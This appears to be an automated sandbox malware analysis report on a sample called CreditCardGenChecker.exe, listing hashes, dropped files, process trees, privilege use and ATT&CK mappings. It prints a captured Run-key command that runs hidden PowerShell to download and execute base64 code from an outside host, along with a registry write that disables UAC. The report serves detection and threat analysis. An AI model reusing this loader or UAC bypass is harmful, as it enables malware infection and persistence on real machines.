Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
11-10-2024 11:30
Static task
static1
Behavioral task
behavioral1
Sample
CreditCardGenChecker.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
CreditCardGenChecker.exe
Resource
win10v2004-20241007-en
General
-
Target
CreditCardGenChecker.exe
-
Size
1.5MB
-
MD5
50efa8e740357a86511b32b7f67193b0
-
SHA1
374e00d228ed1510f8cbc07558dd714b83e43f18
-
SHA256
54b2a237e237d0060e5d8f5ab612c0b236f5f39d07b311af99fa1e7e986ee0e9
-
SHA512
fc258fff378ae5ac756f4068c015b2bfea0047928f42c15867836f924eb4b95c1e6c404730a5c8dfd074b3e0208994530557b7aadb03868e4dc21d243a8e9a71
-
SSDEEP
12288:TyV3Wsxv4Til5TYyUyQc8uHgo2aYFSvRX55Lm1LsLzEg5xC4BSE9:TyxWcMoSDuAxaUSZDLmBsLzEg5xCvE9
Malware Config
Signatures
-
Processes:
CardsChecker.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" CardsChecker.exe -
Drops file in Drivers directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts svchost.exe -
Drops startup file 1 IoCs
Processes:
sysapp.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk sysapp.exe -
Executes dropped EXE 2 IoCs
Processes:
sysapp.exeCardsChecker.exepid process 2356 sysapp.exe 2104 CardsChecker.exe -
Loads dropped DLL 3 IoCs
Processes:
CreditCardGenChecker.exesysapp.exepid process 2588 CreditCardGenChecker.exe 2588 CreditCardGenChecker.exe 2356 sysapp.exe -
Processes:
resource yara_rule behavioral1/memory/2104-74-0x0000000000AC0000-0x0000000000BC4000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\CardsChecker.exe vmprotect -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
sysapp.exeCardsChecker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\{90F4370F114B3207603164}\\{90F4370F114B3207603164}.exe" sysapp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Inc = "cmd.exe /c powershell -NoProfile -WindowStyle Hidden -Command [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring('http://xiiideath.com/avx'))).EntryPoint.invoke($null,$null)" CardsChecker.exe -
Processes:
CardsChecker.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" CardsChecker.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CardsChecker.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
sysapp.exedescription pid process target process PID 2356 set thread context of 2760 2356 sysapp.exe svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
CardsChecker.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CardsChecker.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
sysapp.exesvchost.exepid process 2356 sysapp.exe 2356 sysapp.exe 2356 sysapp.exe 2356 sysapp.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe 2760 svchost.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
sysapp.exeCardsChecker.exedescription pid process Token: SeIncreaseQuotaPrivilege 2356 sysapp.exe Token: SeSecurityPrivilege 2356 sysapp.exe Token: SeTakeOwnershipPrivilege 2356 sysapp.exe Token: SeLoadDriverPrivilege 2356 sysapp.exe Token: SeSystemProfilePrivilege 2356 sysapp.exe Token: SeSystemtimePrivilege 2356 sysapp.exe Token: SeProfSingleProcessPrivilege 2356 sysapp.exe Token: SeIncBasePriorityPrivilege 2356 sysapp.exe Token: SeCreatePagefilePrivilege 2356 sysapp.exe Token: SeBackupPrivilege 2356 sysapp.exe Token: SeRestorePrivilege 2356 sysapp.exe Token: SeShutdownPrivilege 2356 sysapp.exe Token: SeDebugPrivilege 2356 sysapp.exe Token: SeSystemEnvironmentPrivilege 2356 sysapp.exe Token: SeRemoteShutdownPrivilege 2356 sysapp.exe Token: SeUndockPrivilege 2356 sysapp.exe Token: SeManageVolumePrivilege 2356 sysapp.exe Token: 33 2356 sysapp.exe Token: 34 2356 sysapp.exe Token: 35 2356 sysapp.exe Token: SeDebugPrivilege 2104 CardsChecker.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
CreditCardGenChecker.exesysapp.exesvchost.exedescription pid process target process PID 2588 wrote to memory of 2356 2588 CreditCardGenChecker.exe sysapp.exe PID 2588 wrote to memory of 2356 2588 CreditCardGenChecker.exe sysapp.exe PID 2588 wrote to memory of 2356 2588 CreditCardGenChecker.exe sysapp.exe PID 2588 wrote to memory of 2104 2588 CreditCardGenChecker.exe CardsChecker.exe PID 2588 wrote to memory of 2104 2588 CreditCardGenChecker.exe CardsChecker.exe PID 2588 wrote to memory of 2104 2588 CreditCardGenChecker.exe CardsChecker.exe PID 2588 wrote to memory of 2104 2588 CreditCardGenChecker.exe CardsChecker.exe PID 2356 wrote to memory of 2760 2356 sysapp.exe svchost.exe PID 2356 wrote to memory of 2760 2356 sysapp.exe svchost.exe PID 2356 wrote to memory of 2760 2356 sysapp.exe svchost.exe PID 2356 wrote to memory of 2760 2356 sysapp.exe svchost.exe PID 2760 wrote to memory of 2868 2760 svchost.exe WerFault.exe PID 2760 wrote to memory of 2868 2760 svchost.exe WerFault.exe PID 2760 wrote to memory of 2868 2760 svchost.exe WerFault.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
CardsChecker.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" CardsChecker.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CreditCardGenChecker.exe"C:\Users\Admin\AppData\Local\Temp\CreditCardGenChecker.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Roaming\sysapp.exe"C:\Users\Admin\AppData\Roaming\sysapp.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2760 -s 2204⤵PID:2868
-
C:\Users\Admin\AppData\Local\Temp\CardsChecker.exe"CardsChecker.exe"2⤵
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2104
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
693KB
MD56f14dcfb307f4f9d9fe04c277f9e6e73
SHA1c1b3cf0ee07b96678b27f546a914cd4501c11b25
SHA256b1fec85f2708e55f07e6301f8ac4f61457d8b5706dc72705d89a9001ee90ca5d
SHA5128ef3c25434c004c2cdf3f07e4e632b42feb180ed740d34f4b5506ee0d387b12bbf0c34ce63250f64fef62de94843ec8a20e62887db0647d06818555b39ce9d80
-
Filesize
278KB
MD5cfc83e7145c70e71874460c78a0e9cf4
SHA1d3ec09e035916e8eceb14cd53650cc843606aae2
SHA256ab97099d14bfaf3fcb3862628d710d5b6b2fa9afa30011ddcf686eb11d6ff92f
SHA512b04b2809e9fff5172a356e9b0fc66c969d9ecf1fd804cf3ff002f489591b7a4e52ca7c5cc874e40fb3bed0982bcae78cc88bbfab52137a4564bdf482a4ad9eb4
-
Filesize
1KB
MD5a59a2823cf4bb50d21773c5a03d06176
SHA12fdfcf1ad6b564184ab61c7650e121a87c8a4673
SHA25676a0a6bc1f2fb9d17bb9bae437c17e84b269d6773cbff0b501dd5df70b0768e4
SHA5121c6e06131aac6f93b652f5b1888a868acdeee5851185086e2597119d636b4a95d96327715e10b95f356d84f2ab5868d25161ab2d05854f229fb9417da2062696